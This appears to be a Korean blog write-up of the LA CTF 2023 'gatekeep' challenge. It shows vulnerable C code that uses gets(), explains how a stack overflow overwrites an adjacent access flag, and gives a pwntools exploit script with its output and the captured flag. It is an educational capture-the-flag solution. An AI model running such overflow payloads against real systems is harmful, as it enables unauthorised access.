728x90
반응형

1. intro

2. code 및 분석

2.1.  code

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>

void print_flag() {
    char flag[256];

    FILE* flagfile = fopen("flag.txt", "r");
    
    if (flagfile == NULL) {
        puts("Cannot read flag.txt.");
    } else {
        fgets(flag, 256, flagfile);
        flag[strcspn(flag, "\n")] = '\0';
        puts(flag);
    }
}

int check(){
    char input[15];
    char pass[10];
    int access = 0;

    // If my password is random, I can gatekeep my flag! :)
    int data = open("/dev/urandom", O_RDONLY);
    if (data < 0)
    {
        printf("Can't access /dev/urandom.\n");
        exit(1);
    }
    else
    {
        ssize_t result = read(data, pass, sizeof pass);
        if (result < 0)
        {
            printf("Data not received from /dev/urandom\n");
            exit(1);
        }
    }
    close(data);
    
    printf("Password:\n");
    gets(input);

    if(strcmp(input, pass)) {
        printf("I swore that was the right password ...\n");
    }
    else {
        access = 1;
    }

    if(access) {
        printf("Guess I couldn't gaslight you!\n");
        print_flag();
    }
}

int main(){
    setbuf(stdout, NULL);
    printf("If I gaslight you enough, you won't be able to guess my password! :)\n");
    check();
    return 0;
}

2.2. 분석

바이너리가 실행되면 check 함수에서 랜덤한 값을 urandom을 통해 가져오고,

password를 입력 받은 다음에 이를 서로 비교해서 access가 1이면 flag를 출력해준다.

 

3. 취약점 확인 및 공격 준비

3.1. 취약점

stack overflow로 인해 타 변수의 값을 조작할 수 있다.

3.2. 공격 준비

첫 문제라 비교적 간단하다.

password가 입력된 값과 동일한지 확인한 뒤 access 변수의 값으로 이를 판단하기 때문에,

access 변수 값을 조작할 수 있으면 flag를 얻을 수 있다.

 

password는 gets로 입력받기 때문에 그 크기가 정해져있지 않아 access 변수까지 침범하여 값을 쓸 수 있다.

 

4. exploit

from pwn import *

#p = process('./gatekeep')
p = remote('lac.tf', 31121)

pay = b'A'*(8+8+7+4)
pay += b'\x01'

p.sendlineafter('Password:\n',pay)

p.interactive()

 

┌──(kali㉿kali)-[~/Downloads/gate]
└─$ python solve.py
[+] Opening connection to lac.tf on port 31121: Done
[*] Switching to interactive mode
I swore that was the right password ...
Guess I couldn't gaslight you!
lactf{sCr3am1nG_cRy1Ng_tHr0w1ng_uP}
728x90
반응형
저작자표시 비영리 변경금지 (새창열림)

'CTF > Solved' 카테고리의 다른 글

LA CTF 2023 - pwn / rickroll  (0) 2023.02.13
LA CTF 2023 - pwn/bot  (0) 2023.02.13
BB CTF 2023 - Medium pwn  (0) 2023.02.06
BB CTF 2023 - Easy pwn  (0) 2023.02.06
DiceCTF 2023 - pwn/bop  (0) 2023.02.06

티스토리툴바